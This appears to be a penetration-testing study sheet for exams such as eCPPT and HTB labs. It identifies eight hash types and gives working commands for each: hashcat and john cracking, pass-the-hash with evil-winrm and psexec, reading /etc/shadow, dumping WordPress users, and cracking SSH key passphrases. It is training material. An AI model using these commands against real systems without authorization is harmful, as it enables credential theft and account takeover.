Hash Types — Situational Examples

For each hash type: where you find it, a real scenario, what it looks like, and exactly what to do when you see it.


1. NTLM Hash (Windows SAM / secretsdump)

Real scenario (example):

You ran impacket-secretsdump and got this line:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa3b347fb64a282e89bae4:::

Breaking this apart:

Administrator    = username
500              = RID (500 = built-in admin)
aad3b435...      = LM hash (empty/disabled — IGNORE this part)
32693b11e6aa...  = NTLM hash (THIS is what you want)

Can you crack it? YES

# Extract just the NTLM part (after the second colon)
hashcat -m 1000 ntlm.hash rockyou.txt

Should you crack it? NO — Pass-the-Hash is faster

# Why waste time cracking when you can just USE the hash directly?
evil-winrm -i $ip -u Administrator -H '32693b11e6aa3b347fb64a282e89bae4'
impacket-psexec DOMAIN/Administrator@$ip -hashes :32693b11e6aa3b347fb64a282e89bae4
nxc smb $ip -u Administrator -H '32693b11e6aa3b347fb64a282e89bae4'

The lesson:

NTLM hashes from secretsdump or SAM dumps are like master keys. You dont need to know the actual password. Windows accepts the hash directly as authentication. Cracking is optional — Pass-the-Hash is instant.

When you DO need to crack NTLM:

  • When you need to RDP and the machine only accepts passwords (not hashes)
  • When you want to spray the actual password against other services (like web apps)

2. NTLMv2 Hash (Responder captures)

Real scenario:

You’re running Responder on the network and capture this:

svc_backup::HTB:1122334455667788:AAF8B0B...long blob...:0101000000000000

Can you crack it? YES — you MUST crack it

hashcat -m 5600 captured.hash rockyou.txt

Can you Pass-the-Hash? NO

NTLMv2 hashes CANNOT be used for Pass-the-Hash. They are challenge-response hashes tied to a specific session. You must crack them to get the plaintext password.

The difference from NTLM:

  • NTLM (from SAM dump) = the stored hash. Can be reused directly.
  • NTLMv2 (from Responder) = a one-time challenge-response. Must be cracked.

3. AS-REP Hash (AS-REP Roasting)

Real scenario (example):

You ran impacket-GetNPUsers and got:

[email protected]:7e52e82c669eac43e4f548297b9d772f$...long blob...

How to recognize it:

Starts with $krb5asrep$23$ — that prefix is unique to AS-REP hashes.

How to crack:

hashcat -m 18200 asrep.hash rockyou.txt
# or
john asrep.hash --wordlist=rockyou.txt

Can you use it without cracking? NO

Unlike NTLM, you cannot pass an AS-REP hash. You must crack it to get the plaintext password.

Why it exists:

The account has “Do not require Kerberos pre-authentication” enabled. The DC hands you a blob encrypted with the user’s password. You crack the blob to recover the password.


4. TGS Hash (Kerberoasting)

Real scenario (example):

You ran impacket-GetUserSPNs and got:

$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$a1b2c3...long blob...

How to recognize it:

Starts with $krb5tgs$23$ — that prefix is unique to Kerberoasting hashes.

How to crack:

hashcat -m 13100 kerberoast.hash rockyou.txt
# or
john kerberoast.hash --wordlist=rockyou.txt

Can you use it without cracking? NO

Same as AS-REP — must crack it to get the plaintext password.

How to remember AS-REP vs TGS:

$krb5asrep$ = AS-REP Roasting = hashcat -m 18200 = no creds needed
$krb5tgs$   = Kerberoasting   = hashcat -m 13100 = creds needed

Look at the hash prefix and you know exactly which it is.


5. Linux Shadow Hash (/etc/shadow)

Real scenario:

You read /etc/shadow on a Linux box and find:

root:$6$xyz123$LongHashStringHere...:19000:0:99999:7:::

How to recognize it:

The $6$ tells you its SHA-512. The number after the first $ sign tells you the hash type:

$1$ = MD5        → hashcat -m 500
$5$ = SHA-256    → hashcat -m 7400
$6$ = SHA-512    → hashcat -m 1800  (most common on modern Linux)

How to crack:

# Copy the full hash including $6$ and salt
echo '$6$xyz123$LongHashStringHere...' > shadow.hash
hashcat -m 1800 shadow.hash rockyou.txt

Linux shadow hashes are SLOW to crack

SHA-512 with salt is designed to be slow. Rockyou might take hours. Try smaller wordlists first.


6. WordPress Hash (phpass)

Real scenario (eCPPT will test WordPress):

You dump the WordPress database and find in wp_users:

admin:$P$BcDsN.F.MIGwMEFfZ3kG6IN0sTqGWs1

How to recognize it:

Starts with $P$ — unique to WordPress/phpass hashes.

How to crack:

hashcat -m 400 wp_hash.txt rockyou.txt
# or
john wp_hash.txt --wordlist=rockyou.txt

How you get WordPress hashes:

  • SQL injection that dumps the wp_users table
  • Direct access to MySQL: SELECT user_login, user_pass FROM wp_users;
  • Finding wp-config.php → get DB creds → connect to MySQL → dump users

7. SSH Key Passphrase

Real scenario:

You find an id_rsa private key file but it’s password-protected:

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25...

The word “ENCRYPTED” tells you it needs a passphrase.

How to crack:

# Step 1: Convert to crackable format
ssh2john id_rsa > ssh_hash.txt

# Step 2: Crack with john (preferred for SSH keys)
john ssh_hash.txt --wordlist=rockyou.txt

Do NOT feed the raw id_rsa file to hashcat — it only reads extracted hashes, not key files. You get “Separator unmatched” on every line. If you must use hashcat: hashcat -m 22921 ssh_hash.txt rockyou.txt (using the ssh2john output, not the raw key).

Then use the key with the cracked passphrase:

chmod 600 id_rsa
ssh -i id_rsa user@target
# Enter passphrase when prompted

8. Apache .htpasswd

Real scenario: Apache .htpasswd file

You find a .htpasswd file:

admin:$apr1$salt$hashedpasswordhere

How to recognize:

Starts with $apr1$ — unique to Apache htpasswd.

How to crack:

hashcat -m 1600 htpasswd.hash rockyou.txt
john htpasswd.hash --wordlist=rockyou.txt

DECISION FLOWCHART: What do I do with this hash?

Found a hash
    ├── Is it an NTLM hash from SAM/secretsdump? (32 hex chars, from Windows)
    │     → TRY PASS-THE-HASH FIRST (evil-winrm -H, psexec -hashes)
    │     → Only crack if you need the actual password
    ├── Is it from Responder/relay? (NTLMv2, long with ::)
    │     → MUST CRACK IT (hashcat -m 5600)
    │     → Cannot pass-the-hash with NTLMv2
    │     → AS-REP hash → hashcat -m 18200
    │     → Kerberoast hash → hashcat -m 13100
    ├── Does it start with $6$ or $5$ or $1$?
    │     → Linux shadow → $6$=1800, $5$=7400, $1$=500
    ├── Does it start with $P$?
    │     → WordPress → hashcat -m 400
    ├── Does it start with $apr1$?
    │     → Apache htpasswd → hashcat -m 1600
    ├── Is it a 32 character hex string with no prefix?
    │     → Probably MD5 → hashcat -m 0
    ├── Is it a 40 character hex string?
    │     → Probably SHA1 → hashcat -m 100
    └── Dont know?
          → Run: hashid 'paste_hash_here'
          → Or: hash-identifier